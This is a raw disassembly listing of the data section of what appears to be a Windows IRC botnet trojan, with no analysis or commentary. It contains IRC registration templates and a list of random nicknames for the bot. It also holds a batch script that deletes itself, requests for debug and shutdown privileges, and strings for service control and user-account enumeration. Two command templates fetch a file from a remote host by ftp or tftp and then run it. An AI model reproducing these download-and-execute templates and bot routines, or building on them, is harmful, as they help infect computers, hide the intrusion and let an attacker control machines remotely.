aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_419FFD+8C�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_419FFD+7F�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_419FFD+72�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_419FFD+67�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_419FFD+54�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_419FFD+40�o
; sub_419FFD+160�o ...
align 4
dword_437368 dd 234032Dh, 646E6966h, 73736170h, 202D0302h, 796C6E6Fh
; DATA XREF: sub_419FFD+35�o
dd 70757320h, 74726F70h, 6F206465h, 6977206Eh, 2F746E6Eh
dd 326E6977h, 6Bh, 7536h, 7535h, 7C75347Ch, 0
a4you db '{4you}',0 ; DATA XREF: .data:00443358�o
align 10h
a4us db '|4us|',0 ; DATA XREF: .data:00443354�o
align 4
aSex4free db '|sex4free|',0 ; DATA XREF: .data:00443350�o
align 4
aLoloA db 'lolo|a|',0 ; DATA XREF: .data:0044334C�o
aLol db 'lol',0 ; DATA XREF: .data:00443348�o
aTot db 'tot',0 ; DATA XREF: .data:00443344�o
aMofo db 'mofo',0 ; DATA XREF: .data:00443340�o
align 4
aMof0 db 'mof0',0 ; DATA XREF: .data:0044333C�o
align 4
aMuha db 'muha',0 ; DATA XREF: .data:00443338�o
align 4
aYeah db 'yeah',0 ; DATA XREF: .data:00443334�o
align 4
aAha db 'aha',0 ; DATA XREF: .data:00443330�o
aShit db 'shit',0 ; DATA XREF: .data:0044332C�o
align 10h
aGurl db 'gurl',0 ; DATA XREF: .data:00443328�o
align 4
aGirl db 'GIRL',0 ; DATA XREF: .data:00443324�o
align 10h
aBoy db 'BOY',0 ; DATA XREF: .data:00443320�o
aFree db 'Free',0 ; DATA XREF: .data:0044330C�o
align 4
aFuck_0 db 'Fuck',0 ; DATA XREF: .data:00443308�o
align 4
aSleeping db 'Sleeping',0 ; DATA XREF: .data:004432FC�o
align 10h
aF db '^^^f^',0 ; DATA XREF: .data:004432F0�o
align 4
aSad db 'Sad',0 ; DATA XREF: .data:004432EC�o
aLuvu db 'LUVU',0 ; DATA XREF: .data:004432E8�o
align 4
a___0 db '_|_',0 ; DATA XREF: .data:004432CC�o
aBbl db '|bbl',0 ; DATA XREF: .data:004432C0�o
align 10h
off_437450 dd offset loc_425241+1 ; DATA XREF: .data:004432BC�o
aMuckc db 'muckc',0 ; DATA XREF: .data:004432A8�o
align 4
aTruck db 'truck',0 ; DATA XREF: .data:004432A4�o
align 4
aTrimy db 'trimy',0 ; DATA XREF: .data:004432A0�o
align 4
aLuvy db 'luvy',0 ; DATA XREF: .data:0044329C�o
align 4
aUi db 'ui',0 ; DATA XREF: .data:00443298�o
align 4
aSdf db 'sdf',0 ; DATA XREF: .data:00443294�o
aRt db 'rt',0 ; DATA XREF: .data:00443290�o
align 10h
aGf db 'gf',0 ; DATA XREF: .data:0044328C�o
align 4
aTy db 'ty',0 ; DATA XREF: .data:00443288�o
align 4
aRg db 'rg',0 ; DATA XREF: .data:00443284�o
align 4
aHappy db 'happy',0 ; DATA XREF: .data:00443280�o
align 4
aRs db 'rs',0 ; DATA XREF: .data:00443260�o
align 4
aQ8A db '|q8|a',0 ; DATA XREF: .data:00443218�o
align 10h
aQ8 db 'Q8',0 ; DATA XREF: .data:00443214�o
align 4
aSick db 'sick}}',0 ; DATA XREF: .data:00443210�o
align 4
aWiked db '|wiked|',0 ; DATA XREF: .data:0044320C�o
aLuvuF db '||luvu-f|',0 ; DATA XREF: .data:00443208�o
align 10h
aGens db '{gens|',0 ; DATA XREF: .data:00443204�o
align 4
aSex_0 db '{sex}',0 ; DATA XREF: .data:00443200�o
align 10h
aHub db '{hub}',0 ; DATA XREF: .data:004431FC�o
align 4
aLuck db '|luck|',0 ; DATA XREF: .data:004431F8�o
align 10h
aSuck db '|suck|',0 ; DATA XREF: .data:004431F4�o
align 4
aTot_0 db '-|tot|',0 ; DATA XREF: .data:004431F0�o
align 10h
aWoh db '|woh|',0 ; DATA XREF: .data:004431EC�o
align 4
aTambe db '|tambe|',0 ; DATA XREF: .data:004431E8�o
aLag db 'lag',0 ; DATA XREF: .data:004431E4�o
aBad db 'bad',0 ; DATA XREF: .data:004431E0�o
aTree db 'tree',0 ; DATA XREF: .data:004431DC�o
align 10h
aZex db 'zex',0 ; DATA XREF: .data:004431D8�o
aLez db 'lez',0 ; DATA XREF: .data:004431D4�o
aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: .data:004431CC�o
align 4
aCumhur29 db 'cumhur29',0 ; DATA XREF: .data:004431C8�o
align 10h
aAdamm db 'ADAMM',0 ; DATA XREF: .data:004431C4�o
align 4
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: .data:004431C0�o
align 4
aPrometheus db 'prometheus',0 ; DATA XREF: .data:004431BC�o
align 10h
aDallas43m db 'DALLAS43M',0 ; DATA XREF: .data:004431B8�o
align 4
aTeoman db 'TEOMAN```',0 ; DATA XREF: .data:004431B4�o
align 4
aRerpjj db 'RERPJJ',0 ; DATA XREF: .data:004431B0�o
align 10h
aCem39 db 'cem39',0 ; DATA XREF: .data:004431AC�o
align 4
aCool30m db 'cool30m',0 ; DATA XREF: .data:004431A8�o
aTropikal db 'tropikal',0 ; DATA XREF: .data:004431A4�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: .data:004431A0�o
align 4
aNeHaber db 'NE-HABER',0 ; DATA XREF: .data:0044319C�o
align 4
aUla db 'ula',0 ; DATA XREF: .data:00443198�o
aIzmirlm db 'izmirlm',0 ; DATA XREF: .data:00443194�o
aAkden db 'akden',0 ; DATA XREF: .data:00443190�o
align 4
aKoray db 'KORAY',0 ; DATA XREF: .data:0044318C�o
align 10h
aAta29 db 'Ata29',0 ; DATA XREF: .data:00443188�o
align 4
aFirtina db 'firtina',0 ; DATA XREF: .data:00443184�o
aAdamm33 db 'AdAMM33',0 ; DATA XREF: .data:00443180�o
aM41ist db 'M41IST',0 ; DATA XREF: .data:0044317C�o
align 10h
aMaxsilla db 'maxsilla',0 ; DATA XREF: .data:00443178�o
align 4
aAdem28 db 'Adem28',0 ; DATA XREF: .data:00443174�o
align 4
aAnkm db 'ankM',0 ; DATA XREF: .data:00443170�o
align 4
aErkan db 'erkan',0 ; DATA XREF: .data:0044316C�o
align 4
aDevre db 'devre',0 ; DATA XREF: .data:00443168�o
align 4
aYabanc db 'yabanc',0 ; DATA XREF: .data:00443164�o
align 4
aBirsen db 'birsen',0 ; DATA XREF: .data:00443160�o
align 4
aA44m db 'a44m',0 ; DATA XREF: .data:0044315C�o
align 4
aAlcatras db 'alcatras',0 ; DATA XREF: .data:00443158�o
align 10h
off_437630 dd offset byte_4B5245 ; DATA XREF: .data:00443154�o
aSevda db 'sevda',0 ; DATA XREF: .data:00443150�o
align 4
aKotan db 'kotan',0 ; DATA XREF: .data:0044314C�o
align 4
aTegmen db 'TEGMEN',0 ; DATA XREF: .data:00443148�o
align 4
aAchilles db 'Achilles',0 ; DATA XREF: .data:00443144�o
align 4
aKapk db 'kapk',0 ; DATA XREF: .data:00443140�o
align 10h
aAngelgirl db 'angelgirl',0 ; DATA XREF: .data:0044313C�o
align 4
aHayran db 'hayran',0 ; DATA XREF: .data:00443138�o
align 4
aFenerlee db 'FeNeRLee',0 ; DATA XREF: .data:00443134�o
align 10h
aAnkar db 'Ankar',0 ; DATA XREF: .data:00443130�o
align 4
aDjspace db 'DJSPACE',0 ; DATA XREF: .data:0044312C�o
aAnk32M db 'ANK-32-M',0 ; DATA XREF: .data:00443128�o
align 4
aUmut db 'umut-',0 ; DATA XREF: .data:00443124�o
align 4
aAdalim db 'ADALIM',0 ; DATA XREF: .data:00443120�o
align 4
aKumul db 'kumul',0 ; DATA XREF: .data:0044311C�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: .data:00443118�o
aSugarboy db 'SUGARBOY-',0 ; DATA XREF: .data:00443114�o
align 4
aSeviseli db 'SeViSeLi',0 ; DATA XREF: .data:00443110�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: .data:0044310C�o
align 10h
aAykut1 db 'aykut1',0 ; DATA XREF: .data:00443108�o
align 4
aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: .data:00443104�o
align 4
aMahinur db 'MAHINUR',0 ; DATA XREF: .data:00443100�o
aHoly db 'holy',0 ; DATA XREF: .data:004430FC�o
align 4
aFlord db 'FLoRD',0 ; DATA XREF: .data:004430F8�o
align 10h
aKebikec db 'kebikec',0 ; DATA XREF: .data:004430F4�o
aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: .data:004430F0�o
align 4
aElmaazyok db 'elmaazyok',0 ; DATA XREF: .data:004430EC�o
align 10h
aEmre db 'Emre--',0 ; DATA XREF: .data:004430E8�o
align 4
aRamtha db 'RAMTHA',0 ; DATA XREF: .data:004430E4�o
align 10h
aImirzali db 'IMIRZALI--',0 ; DATA XREF: .data:004430E0�o
align 4
aHakan3 db 'hakan3',0 ; DATA XREF: .data:004430DC�o
align 4
aMurat34M db 'murat34-m',0 ; DATA XREF: .data:004430D8�o
align 10h
aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: .data:004430D4�o
aArda db 'arda',0 ; DATA XREF: .data:004430D0�o
align 4
aDevran db 'devran',0 ; DATA XREF: .data:004430CC�o
align 4
aBerk19m db 'Berk19m',0 ; DATA XREF: .data:004430C8�o
aDenizlim db 'DenizliM',0 ; DATA XREF: .data:004430C4�o
align 10h
aCongueror db 'CoNGuERoR',0 ; DATA XREF: .data:004430C0�o
align 4
aAlpay34m db 'alpay34m',0 ; DATA XREF: .data:004430BC�o
align 4
aBogac db 'bogac',0 ; DATA XREF: .data:004430B8�o
align 10h
aDonjuanm db 'Donjuanm',0 ; DATA XREF: .data:004430B4�o
align 4
aAnkh db 'ankh',0 ; DATA XREF: .data:004430B0�o
align 4
off_4377C4 dd offset byte_457441 ; DATA XREF: .data:004430AC�o
aAyla db 'AYLA-',0 ; DATA XREF: .data:004430A8�o
align 10h
aAlbina db 'albina',0 ; DATA XREF: .data:004430A4�o
align 4
aIzmir39m db 'Izmir39m',0 ; DATA XREF: .data:004430A0�o
align 4
aZack db 'ZACK',0 ; DATA XREF: .data:0044309C�o
align 4
aAnk32m db 'ank32m',0 ; DATA XREF: .data:00443098�o
align 4
aTurkyy db 'turkyy',0 ; DATA XREF: .data:00443094�o
align 4
aAhmet db 'ahmet',0 ; DATA XREF: .data:00443090�o
align 4
aPelincik db 'pelincik',0 ; DATA XREF: .data:0044308C�o
align 10h
aBlackpearl db 'blackpearl',0 ; DATA XREF: .data:00443088�o
align 4
aRetg db 'RETG',0 ; DATA XREF: .data:00443084�o
align 4
aSamyeli21 db 'samyeli21',0 ; DATA XREF: .data:00443080�o
align 10h
aPiramit db 'PIRAMIT',0 ; DATA XREF: .data:0044307C�o
aAslii db 'aslii',0 ; DATA XREF: .data:00443078�o
align 10h
aErnesto db 'ERNESTO',0 ; DATA XREF: .data:00443074�o
aHaticem db 'haticem',0 ; DATA XREF: .data:00443070�o
aArzu db 'ARZU',0 ; DATA XREF: .data:0044306C�o
align 4
aSudenur db 'SUDENUR',0 ; DATA XREF: .data:00443068�o
aSevmekmi db 'sevmekmi',0 ; DATA XREF: .data:00443064�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: .data:00443060�o
align 4
aTekir db 'tekir',0 ; DATA XREF: .data:0044305C�o
align 10h
aMERVE db 'M-E-R-V-E',0 ; DATA XREF: .data:00443058�o
align 4
aTrend3 db 'trend3',0 ; DATA XREF: .data:00443054�o
align 4
aMelekk db 'melekk',0 ; DATA XREF: .data:00443050�o
align 4
aAkin db 'AKIN',0 ; DATA XREF: .data:0044304C�o
align 4
aMary_0 db 'MARY',0 ; DATA XREF: .data:00443048�o
align 4
aJericho db 'JERICHO',0 ; DATA XREF: .data:00443044�o
aTolga34 db 'Tolga34',0 ; DATA XREF: .data:00443040�o
aMisssunday db 'misssunday',0 ; DATA XREF: .data:0044303C�o
align 4
aIrmal db 'irmal',0 ; DATA XREF: .data:00443038�o
align 10h
aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: .data:00443034�o
align 10h
aBerk19 db 'berk19',0 ; DATA XREF: .data:00443030�o
align 4
aHexaaa db 'hexaaa',0 ; DATA XREF: .data:0044302C�o
align 10h
aErkan27 db 'erkan27',0 ; DATA XREF: .data:00443028�o
aKaan38dent db 'kaan38dent',0 ; DATA XREF: .data:00443024�o
align 4
aCansuuuu db 'cansuuuu',0 ; DATA XREF: .data:00443020�o
align 10h
aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: .data:0044301C�o
align 4
aKencing db 'Kencing',0 ; DATA XREF: .data:00443018�o
aReshma db 'reshma',0 ; DATA XREF: .data:00443014�o
align 4
aCamel db 'CAMEL',0 ; DATA XREF: .data:00443010�o
align 4
aGirl_0 db 'GirL',0 ; DATA XREF: .data:0044300C�o
align 4
aImra db 'imra',0 ; DATA XREF: .data:00443008�o
align 4
aCoredump db 'CoreDump',0 ; DATA XREF: .data:00443004�o
align 10h
aPuregold db 'puregold',0 ; DATA XREF: .data:00443000�o
align 4
aKermit db 'kermit',0 ; DATA XREF: .data:00442FFC�o
align 4
aManee db 'manee',0 ; DATA XREF: .data:00442FF8�o
align 4
aTroller db 'troller',0 ; DATA XREF: .data:00442FF4�o
aLuisa db 'Luisa',0 ; DATA XREF: .data:00442FF0�o
align 4
aNastysha db 'nastysha',0 ; DATA XREF: .data:00442FEC�o
align 4
aRimpy db 'rimpy',0 ; DATA XREF: .data:00442FE8�o
align 10h
aJanno db 'janno',0 ; DATA XREF: .data:00442FE4�o
align 4
aBunty db 'bunty',0 ; DATA XREF: .data:00442FE0�o
align 10h
aHeval db 'heval',0 ; DATA XREF: .data:00442FDC�o
align 4
aCme db 'cme',0 ; DATA XREF: .data:00442FD8�o
aMarcy db 'marcy',0 ; DATA XREF: .data:00442FD4�o
align 4
aTalika db 'talika',0 ; DATA XREF: .data:00442FD0�o
align 4
aShez db 'Shez',0 ; DATA XREF: .data:00442FCC�o
align 4
aKen db 'ken',0 ; DATA XREF: .data:00442FC8�o
aFlexster db 'flexster',0 ; DATA XREF: .data:00442FC4�o
align 4
aKoko db 'koko',0 ; DATA XREF: .data:00442FC0�o
align 4
aMale db 'male',0 ; DATA XREF: .data:00442FBC�o
align 4
aSwin db 'swin',0 ; DATA XREF: .data:00442FB8�o
align 4
aCar1nna db 'Car1nna',0 ; DATA XREF: .data:00442FB4�o
aKrizha db 'KRIZHA',0 ; DATA XREF: .data:00442FB0�o
align 4
aEmilya db 'emilya',0 ; DATA XREF: .data:00442FAC�o
align 4
aBobmarley db 'BOBMARLEY',0 ; DATA XREF: .data:00442FA8�o
align 10h
aMaxxguy db 'maxxguy',0 ; DATA XREF: .data:00442FA4�o
aFarooq db 'farooq',0 ; DATA XREF: .data:00442FA0�o
align 10h
aSmartmir db 'SMARTMIR',0 ; DATA XREF: .data:00442F9C�o
align 4
aM_1: ; DATA XREF: .data:00442F98�o
; .data:004432E4�o
unicode 0, <M>,0
aN_0: ; DATA XREF: .data:00442F94�o
unicode 0, <N>,0
aB: ; DATA XREF: .data:00442F90�o
unicode 0, <B>,0
aV_0: ; DATA XREF: .data:00442F8C�o
unicode 0, <V>,0
aC_3: ; DATA XREF: .data:00442F88�o
unicode 0, <C>,0
asc_437A40: ; DATA XREF: .data:00442F84�o
; .data:00443318�o
unicode 0, <X>,0
aZ: ; DATA XREF: .data:00442F80�o
unicode 0, <Z>,0
asc_437A48: ; DATA XREF: .data:00442F7C�o
unicode 0, <L>,0
aK_0: ; DATA XREF: .data:00442F78�o
unicode 0, <K>,0
aJ_0: ; DATA XREF: .data:00442F74�o
unicode 0, <J>,0
asc_437A54: ; DATA XREF: .data:00442F70�o
unicode 0, <H>,0
aG: ; DATA XREF: .data:00442F6C�o
unicode 0, <G>,0
aF_0: ; DATA XREF: .data:00442F68�o
; .data:004432E0�o
unicode 0, <F>,0
aD_2: ; DATA XREF: .data:00442F64�o
unicode 0, <D>,0
aS_10: ; DATA XREF: .data:00442F60�o
unicode 0, <S>,0
aP_0: ; DATA XREF: .data:00442F58�o
unicode 0, <P>,0
aO_0: ; DATA XREF: .data:00442F54�o
unicode 0, <O>,0
aU_0: ; DATA XREF: .data:00442F4C�o
unicode 0, <U>,0
aY: ; DATA XREF: .data:00442F48�o
unicode 0, <Y>,0
aT_0: ; DATA XREF: .data:00442F44�o
unicode 0, <T>,0
aR_0: ; DATA XREF: .data:00442F40�o
unicode 0, <R>,0
aE_0: ; DATA XREF: .data:00442F3C�o
unicode 0, <E>,0
aW: ; DATA XREF: .data:00442F38�o
unicode 0, <W>,0
aQ_0: ; DATA XREF: .data:00442F34�o
unicode 0, <Q>,0
aB_0: ; DATA XREF: .data:00442F28�o
; .data:0044321C�o ...
unicode 0, <b>,0
asc_437A90: ; DATA XREF: .data:00442F1C�o
; .data:00443274�o
unicode 0, <x>,0
aZ_0: ; DATA XREF: .data:00442F18�o
; .data:0044327C�o ...
unicode 0, <z>,0
asc_437A98: ; DATA XREF: .data:00442F08�o
; .data:00443234�o
unicode 0, <h>,0
aG_0: ; DATA XREF: .data:00442F04�o
; .data:00443230�o ...
unicode 0, <g>,0
aF_1: ; DATA XREF: .data:00442F00�o
; .data:0044322C�o
unicode 0, <f>,0
aY_0: ; DATA XREF: .data:00442EE4�o
; .data:00443278�o
unicode 0, <y>,0
aW_0: ; DATA XREF: .data:00442ED4�o
; .data:00443270�o
unicode 0, <w>,0
align 10h
dbl_437AB0 dq -1.52587890625e-4 ; DATA XREF: sub_41A293+3EF�r
dbl_437AB8 dq 3.0517578125e-4 ; DATA XREF: sub_41A293+3CF�r
dbl_437AC0 dq -3.0517578125e-4 ; DATA XREF: sub_41A293+34C�r
; sub_41A293+3B1�r
dbl_437AC8 dq 1.52587890625e-4 ; DATA XREF: sub_41A293+27E�r
dbl_437AD0 dq -1.739501953125e-3 ; DATA XREF: sub_41A293+258�r
; sub_41A293+2E8�r ...
dbl_437AD8 dq 3.11279296875e-3 ; DATA XREF: sub_41A293+E0�r
; char a__1[]
a__1 db '-|`_\{[]}',0 ; DATA XREF: sub_41A293+BA�o
; sub_41A293+17C�r ...
align 10h
dbl_437AF0 dq 3.0517578125e-5 ; DATA XREF: sub_41A293+AC�r
; sub_41A293+139�r ...
dbl_437AF8 dq 6.103515625e-5 ; DATA XREF: sub_41A293+90�r
; sub_41A293+317�r
dbl_437B00 dq 2.288818359375e-3 ; DATA XREF: sub_41A293+21�r
; char aNickS_1[]
aNickS_1 db 'NICK %s',0Ah,0 ; DATA XREF: sub_41A6AE+C1�o
align 4
; char a432[]
a432 db '432',0 ; DATA XREF: sub_41A6AE+86�o
; char aPongS_0[]
aPongS_0 db 'PONG %s',0Ah,0 ; DATA XREF: sub_41A6AE+65�o
align 4
; char aNickSUserSHotm[]
aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: sub_41A7A3+98�o
db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0
align 4
; char aSErrorSD_[]
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_41ACD0+72�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_41AE17+1A�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_41AEBB+2�o
; char aComspecCSS[]
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_41AEDD+140�o
align 8
; char a[]
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_41AEDD+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
; char aSdel_bat[]
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_41AEDD+48�o
align 4
; char asc_437BF8[]
asc_437BF8 db '-' ; DATA XREF: sub_41B065+9C�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aOperatingSyste db '- operating system is not supported',0
align 4
unk_437C28 db 2Dh ; - ; DATA XREF: sub_41B065+8F�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedWithErro db '- failed with error code %d',0
align 10h
; char asc_437C50[]
asc_437C50 db '-' ; DATA XREF: sub_41B065+5C�o
db 3, 34h, 2
dd 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h, 65726165h
dd 64h, 0
; char aEchoOpenSDOE_1[]
aEchoOpenSDOE_1 db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: sub_41B128+C2�o
db 'it >> o &ftp -n -s:o &%s',0Dh,0Ah,0
; char aTftpISGetSS[]
aTftpISGetSS db 'tftp -i %s get %s &%s',0Dh,0Ah,0 ; DATA XREF: sub_41B128+94�o
align 8
dbl_437CE8 dq -3.0517578125e-5 ; DATA XREF: sub_41B325+2B�r
aContinued db 'Continued',0
align 4
aContinue_0 db 'Continue',0
align 4
aPaused_0 db 'Paused',0
align 10h
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0044342C�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:00443428�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:00443420�o
aStart_0 db 'Start',0 ; DATA XREF: .data:0044341C�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:00443414�o
align 10h
aList_1 db 'List',0 ; DATA XREF: .data:00443410�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:00443408�o
aDelete_0 db 'Delete',0 ; DATA XREF: .data:00443404�o
align 4
aAdded db 'Added',0 ; DATA XREF: .data:off_4433FC�o
align 10h
aAdd db 'Add',0 ; DATA XREF: .data:off_4433F8�o
; char aAnUnknownErr_0[]
aAnUnknownErr_0 db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_41B507+128�o
align 4
; char aTheSystemIsShu[]
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_41B507:loc_41B61B�o
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_41B507:loc_41B614�o
align 10h
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_41B507:loc_41B60D�o
db 'the state of the service.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_41B507:loc_41B606�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_41B507:loc_41B5FF�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_41B507:loc_41B5F8�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_41B507:loc_41B5F1�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_41B507:loc_41B5EA�o
align 8
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_41B507:loc_41B5E3�o
db 'marked for deletion.',0
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_41B507:loc_41B5DC�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_41B507:loc_41B5B1�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_41B507:loc_41B5AA�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_41B507:loc_41B5A3�o
db 'tServiceCtrlDispatcher.',0
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_41B507:loc_41B59C�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_41B507+8B�o
align 10h
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_41B507:loc_41B571�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_41B507:loc_41B567�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_41B507:loc_41B55D�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_41B507:loc_41B553�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_41B507:loc_41B549�o
align 4
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_41B507+38�o
align 10h
; char aSSS_3[]
aSSS_3 db '%s: %s (%s)',0 ; DATA XREF: sub_41B681+EE�o
; char aStopped[]
aStopped db ' Stopped',0 ; DATA XREF: sub_41B681:loc_41B750�o
aStarting db ' Starting',0 ; DATA XREF: sub_41B681:loc_41B749�o
aStoping db ' Stoping',0 ; DATA XREF: sub_41B681:loc_41B742�o
aRunning db ' Running',0 ; DATA XREF: sub_41B681:loc_41B73B�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_41B681:loc_41B734�o
aPausing db ' Pausing',0 ; DATA XREF: sub_41B681:loc_41B72D�o
aPaused db ' Paused',0 ; DATA XREF: sub_41B681:loc_41B726�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_41B681+9E�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_41B681+25�o
align 4
; char asc_4382AC[]
asc_4382AC db '-' ; DATA XREF: sub_41B98C+394�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserInfoErrorL db '- user info error <%ld>',0
align 10h
; char aUnitsPerWeekD[]
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_41B98C+36A�o
align 4
; char aMax_StorageD[]
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_41B98C+33F�o
align 4
; char aUserSLanguageD[]
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_41B98C+317�o
; char aCountryCodeD[]
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_41B98C+2EC�o
align 10h
; char aWorkstationsS[]
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_41B98C+2C4�o
align 4
; char aLogonServerS[]
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_41B98C+299�o
align 4
; char aLastLogoffD[]
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_41B98C+271�o
; char aLastLogonD[]
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_41B98C+246�o
align 4
; char aNumberOfLogins[]
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_41B98C+21E�o
align 10h
; char aBadPasswordCou[]
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_41B98C+1F3�o
align 4
; char aPasswordAgeD[]
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_41B98C+1CB�o
align 4
; char aParametersS[]
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_41B98C+1A0�o
align 4
; char aHomeDirectoryS[]
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_41B98C+178�o
align 10h
; char aAuthFlagsD[]
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_41B98C+14D�o
align 10h
; char aPrivilegeLevel[]
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_41B98C+125�o
aGuest db 'Guest',0 ; DATA XREF: sub_41B98C:loc_41BAA5�o
align 4
aUser_3 db 'User',0 ; DATA XREF: sub_41B98C:loc_41BA9E�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_41B98C:loc_41BA97�o
align 4
; char aCommentS[]
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_41B98C+D4�o
; char aUserCommentS[]
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_41B98C+AC�o
align 4
; char aFullNameS[]
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_41B98C+81�o
align 4
; char aAccountS[]
aAccountS db 'Account: %S',0 ; DATA XREF: sub_41B98C+50�o
; char aNetworkConnect[]
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_41BD5A:loc_41BE73�o
align 10h
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_41BD5A:loc_41BE6C�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_41BD5A:loc_41BE65�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_41BD5A:loc_41BE5E�o
align 4
aAnUnknownError db 'An unknown error occurred.',0 ; DATA XREF: sub_41BD5A:loc_41BE57�o
align 8
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_41BD5A:loc_41BE3A�o
db 'ord policy requirement.)',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_41BD5A:loc_41BE33�o
align 10h
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_41BD5A:loc_41BE2C�o
align 8
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_41BD5A+CB�o
db ' the domain.',0
align 4
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_41BD5A:loc_41BE01�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_41BD5A:loc_41BDFA�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_41BD5A:loc_41BDF3�o
